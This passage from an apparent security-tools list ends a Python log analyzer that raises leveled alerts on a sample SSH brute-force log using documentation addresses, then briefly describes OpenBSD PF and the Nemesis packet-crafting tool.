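                            "srcip": ip, "user": user, "time": ts.strftime("%H:%M:%S")})


# Constructed sample log (hostname and addresses are documentation/test values).
SAMPLE_LOG = """\
Mar  3 10:15:01 host1 sshd[2231]: Failed password for invalid user admin from 203.0.113.7 port 51022 ssh2
Mar  3 10:15:04 host1 sshd[2233]: Failed password for invalid user test from 203.0.113.7 port 51030 ssh2
Mar  3 10:15:08 host1 sshd[2235]: Failed password for root from 203.0.113.7 port 51041 ssh2
Mar  3 10:15:11 host1 sshd[2238]: Failed password for root from 203.0.113.7 port 51052 ssh2
Mar  3 10:15:15 host1 sshd[2240]: Failed password for invalid user oracle from 203.0.113.7 port 51060 ssh2
Mar  3 10:15:30 host1 sshd[2299]: Accepted publickey for alice from 198.51.100.4 port 52000 ssh2
Mar  3 10:16:02 host1 sshd[2301]: Failed password for bob from 198.51.100.4 port 52010 ssh2
Mar  3 10:16:05 host1 CRON[2310]: (root) CMD (run-parts /etc/cron.hourly)
"""


def analyze(text: str = SAMPLE_LOG) -> List[Dict]:
    analyzer = LogAnalyzer()
    for line in text.splitlines():
        analyzer.feed(line)
    return analyzer.alerts


if __name__ == "__main__":
    for a in analyze():
        print(f"level {a['level']:>2} {a['time']} {a['host']} {a['rule']} "
              f"srcip={a['srcip']} user={a['user']}")
```

Run against the sample log, the five failures from 203.0.113.7 each produce a level-5 alert and the fifth also triggers the level-10 composite alert, while the single failure from 198.51.100.4 stays at level 5. The level is what lets an operator route noise (level 3 and 5) to storage and the composite alert to a pager; in the client/server deployment the page describes, the clients forward the raw lines and this correlation runs centrally on the server.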
57. Openbsd PF is a favorite firewall tool among OpenBSD users. It offers network address translation, TCP/IP communication management, bandwidth control, and packet prioritization. It has additional features like passive OS detection. PF is created by the same group that wrote OpenBSD, having undergone careful evaluation, design, and coding to avoid exposing vulnerabilities similar to those in other packet filters.
58. Nemesis: Can be used to construct almost any type of ICMP packet.